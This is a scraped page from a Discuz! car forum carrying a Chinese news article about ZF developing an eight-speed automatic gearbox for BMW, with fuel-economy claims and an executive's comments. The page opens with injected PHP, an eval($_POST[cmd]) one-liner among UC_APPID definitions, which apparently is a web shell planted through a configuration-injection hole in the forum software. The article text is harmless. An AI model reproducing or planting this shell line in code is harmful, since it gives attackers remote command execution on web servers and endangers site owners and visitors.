');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 經濟環保 奧迪寶馬頂級車欲用八速變速箱 - 新車俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

經濟環保 奧迪寶馬頂級車欲用八速變速箱

據悉,世界有名的變速器製造商一一德國ZF公司正在為寶馬研發全新的八速自動變速器,該變速器最初將有望配備在全新寶馬7系轎跑車上,而該變速箱進行實際應用的時間則最早要到2009年。傳聞新款的變速箱在燃油效率以及製造工藝上面都相比現行版本的6檔變速箱有大幅度的提升,不僅使得車子的燃油經濟性更高,整體售價降低,性能上也堪比去年應用於寶馬M3上面更加先進的7檔雙離合器變速箱。

  著名的媒體Automotive News表示,寶馬集團的開發主管克勞斯·拽爾格表示將會集中精力於開發自動變速箱的工作上而不是雙離合器變速箱上面,因為前者明顯應用的區域要更加廣泛一些。

  "我們現在與ZF公司通力合作的自動變速箱在換擋時候的便利性堪比雙離合器版本,但是在質量輕盈以及效率上面就更勝一籌,同時價格上面也優勢明顯。"他表示,"但是和高引擎轉速不匹配則是一個難以克服的缺點。雙離合器的結構複雜,造價昂貴,質量較大,尤其是對於縱置的發動機以及後輪驅動車輛來說,影響更甚。"



  通過分析寶馬車系的測試數據,ZF發現其研發的全新變速器可在目前的六速自動變速器的基礎上使汽油發動機的燃油經濟性提升3個百分點,而柴油版則為6個百分點。 這兩款變速箱都會在德國ZF公司位於Saarbrucken的工廠生產,其中大部分都會運用在寶馬車型之上。
返回列表